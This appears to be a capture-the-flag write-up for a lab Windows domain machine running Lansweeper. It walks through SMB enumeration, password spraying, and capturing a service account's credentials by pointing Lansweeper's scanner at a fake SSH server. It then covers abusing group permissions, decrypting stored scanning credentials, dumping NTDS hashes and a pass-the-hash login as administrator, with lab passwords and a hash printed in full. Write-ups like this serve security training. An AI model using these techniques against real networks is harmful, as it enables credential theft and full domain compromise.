Sweep

A medium vulnlab machine

Enumeration

This is the nmap scan below :-


┌──(krrish㉿krrish)-[~/hackthebox/sweep]
└─$ nmapAutomator -H 10.129.234.177 -t All

Running all scans on 10.129.234.177

Host is likely running Windows


---------------------Starting Port Scan-----------------------



PORT     STATE SERVICE
53/tcp   open  domain
81/tcp   open  hosts2-ns
82/tcp   open  xfer
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
5985/tcp open  wsman



---------------------Starting Script Scan-----------------------



PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
81/tcp   open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
82/tcp   open  ssl/xfer?
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after:  2121-12-21T09:22:27
| tls-alpn:
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2026-01-05 03:04:31Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl, Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=inventory.sweep.vl
| Not valid before: 2026-01-04T03:02:47
|_Not valid after:  2026-07-06T03:02:47
| rdp-ntlm-info:
|   Target_Name: SWEEP
|   NetBIOS_Domain_Name: SWEEP
|   NetBIOS_Computer_Name: INVENTORY
|   DNS_Domain_Name: sweep.vl
|   DNS_Computer_Name: inventory.sweep.vl
|   DNS_Tree_Name: sweep.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-01-05T03:05:03+00:00
|_ssl-date: 2026-01-05T03:05:43+00:00; +1s from scanner time.
5985/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2026-01-05T03:05:04
|_  start_date: N/A




---------------------Starting Full Scan------------------------



PORT      STATE SERVICE
53/tcp    open  domain
81/tcp    open  hosts2-ns
82/tcp    open  xfer
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
9524/tcp  open  unknown
49664/tcp open  unknown
49668/tcp open  unknown
55984/tcp open  unknown
55998/tcp open  unknown
63191/tcp open  unknown
63192/tcp open  unknown
64639/tcp open  unknown

In the nmap scan we can see that there is port 81 which is running LandSweeper service and has a login page .

Landsweeper is a service that help IT companies manage and monitor their technological assets , works on IT environments such as cloud , IoT , OT , etc.

First let's focus on smb enumeration and check the guest login and gather more data about domain

nxc smb 10.129.234.177 -u '.' -p ''
nxc smb 10.129.234.177 -u '.' -p '' --shares
nxc smb 10.129.234.177 -u '.' -p '' --rid-brute

here we can see that guest login is enabled so we did --rid-brute to info about domain

Let's make a users.txt for these users and try if any user has password same as its user

┌──(krrish㉿krrish)-[~/hackthebox/sweep]
└─$ cat users.txt
Administrator
Guest
krbtgt
INVENTORY$
jgre808
bcla614
hmar648
jgar931
fcla801
jwil197
grob171
fdav736
jsmi791
hjoh690
svc_inventory_win
svc_inventory_lnx
intern

kerbrute passwordspray -d sweep.vl --dc inventory.sweep.vl users.txt --user-as-pass

here we have got a hit as the user intern has same password as its username
enumerating more about this user tells us that he can read more shares than the guest , but unfortunately we didn't get anything

For user

When i further tried this password on the Landsweeper website , it was valid and we can login and explore the website

in Landsweeper we can abuse the scanning service , and the way we can abuse is ask a service account to scan a service or target by trying to login with the help of his credentials and see if it is working or not
we will setup a fake ssh server and the service account will login in that

Now let's just configure the scanning and setup a fake ssh server to get the creds

first click on scanning --> scanning targets --> then click on add scanning targets

change the ssh port to 6969 as this will the port in our fake ssh server , also add your IP in the start IP
then save it , then go on scanning --> scanning credentials --> then credential mapping and add one with the below configuration and save it

go to the terminal and just make one file called ssh.conf & start the fake server

┌──(krrish㉿krrish)-[~/hackthebox/sweep]
└─$ cat ssh.conf
server:
  listen_address: 10.10.14.95:6969
  
┌──(krrish㉿krrish)-[~/hackthebox/sweep]
└─$ sshesame -config ssh.conf
INFO 2026/01/05 09:59:41 No host keys configured, using keys at "/home/krrish/.local/share/sshesame"
INFO 2026/01/05 09:59:41 Listening on 10.10.14.95:6969

now go on scanning targets and click on scan now

after sometime we will get the credentials of user svc_inventory_lnx

┌──(krrish㉿krrish)-[~/hackthebox/sweep]
└─$ sshesame -config ssh.conf
INFO 2026/01/05 09:59:41 No host keys configured, using keys at "/home/krrish/.local/share/sshesame"
INFO 2026/01/05 09:59:41 Listening on 10.10.14.95:6969
WARNING 2026/01/05 10:05:32 Failed to establish SSH connection: EOF
WARNING 2026/01/05 10:05:40 Failed to establish SSH connection: ssh: disconnect, reason 11: Session closed
WARNING 2026/01/05 10:08:33 Failed to establish SSH connection: EOF
WARNING 2026/01/05 10:08:37 Failed to establish SSH connection: ssh: disconnect, reason 11: Session closed
WARNING 2026/01/05 10:12:37 Failed to establish SSH connection: EOF
WARNING 2026/01/05 10:12:44 Failed to establish SSH connection: ssh: disconnect, reason 11: Session closed
2026/01/05 10:12:44 [10.129.234.177:56447] authentication for user "svc_inventory_lnx" without credentials rejected
2026/01/05 10:12:44 [10.129.234.177:56447] authentication for user "svc_inventory_lnx" with password "0|5m-U6?/uAX" accepted
2026/01/05 10:12:44 [10.129.234.177:56447] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2026/01/05 10:12:44 [10.129.234.177:56447] [channel 0] session requested
2026/01/05 10:12:44 [10.129.234.177:56447] [channel 0] command "uname" requested
2026/01/05 10:12:45 [10.129.234.177:56447] [channel 0] closed
2026/01/05 10:12:45 [10.129.234.177:56447] connection closed
2026/01/05 10:12:45 [10.129.234.177:56448] authentication for user "svc_inventory_lnx" without credentials rejected
2026/01/05 10:12:45 [10.129.234.177:56448] authentication for user "svc_inventory_lnx" with password "0|5m-U6?/uAX" accepted
2026/01/05 10:12:45 [10.129.234.177:56448] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2026/01/05 10:12:45 [10.129.234.177:56448] [channel 0] session requested
2026/01/05 10:12:45 [10.129.234.177:56448] [channel 0] PTY using terminal "xterm" (size 80x25) requested
2026/01/05 10:12:46 [10.129.234.177:56448] [channel 0] shell requested
2026/01/05 10:12:46 [10.129.234.177:56448] [channel 0] input: "smclp"
2026/01/05 10:12:46 [10.129.234.177:56448] [channel 0] input: "show system1"
WARNING 2026/01/05 10:12:56 Error sending CRLF: EOF
2026/01/05 10:12:56 [10.129.234.177:56448] [channel 0] closed
2026/01/05 10:12:56 [10.129.234.177:56448] connection closed

The credentials of user svc_inventory_lnx were correct and it has same shares access like the intern user so it was not worth it to explore shares , but was quite worth it to explore bloodhound

nxc smb 10.129.234.177 -u svc_inventory_lnx -p '0|5m-U6?/uAX'
nxc smb 10.129.234.177 -u svc_inventory_lnx -p '0|5m-U6?/uAX' --shares

in the bloodhound we can see that the user svc_inventory_lnx has GenericAll on the group LANDSWEEPER ADMINS and further the users of group LANDSWEEPER ADMINS are the members of REMOTE MANAGEMENT USERS so we can take the shell (winrm)

let's add the svc_inventory_lnx to the Landsweeper Admins

┌──(krrish㉿krrish)-[~/hackthebox/sweep]
└─$ bloodyAD --host inventory.sweep.vl -d sweep.vl -u svc_inventory_lnx -p '0|5m-U6?/uAX' add groupMember "Lansweeper Admins" svc_inventory_lnx

let's grab the user.txt from winrm shell

evil-winrm-py -i 10.129.234.177 -u svc_inventory_lnx -p '0|5m-U6?/uAX'

For root

The way I did was I used an automated tool that will automatically decrypt the password stored in the local database of the Landsweeper that are used for scanning credentials

https://github.com/Yeeb1/SharpLansweeperDecrypt

evil-winrm-py PS C:\Users\svc_inventory_lnx> .\LansweeperDecrypt.ps1
<connectionStrings>
    <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk2)Dw3!Wf1)Hh;Connect Timeout=10;Application Name=&quot;LsService Core .Net SqlClient Data Provider&quot;" providerName="System.Data.SqlClient" />
</connectionStrings>

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^56!sK&}eA?
Inventory Linux   svc_inventory_lnx       0|5m-U6?/uAX

in the bloodhound we can see that svc_inventory_win is in Administrators group , so we can dump the hashes :)

nxc smb 10.129.234.177 -u svc_inventory_win -p '4^56!sK&}eA?' --ntds

let's grab the root.txt using admin hash

evil-winrm-py -i 10.129.234.177 -u administrator -H 9c848493e98f9c3203a208e7d207374e

Pwn3d the machine !!

PreviousRetro NextPage 1

Last updated 1 month ago

hashtagEnumeration

hashtagFor user

hashtagFor root

hashtagPwn3d the machine !!

Enumeration

For user

For root

Pwn3d the machine !!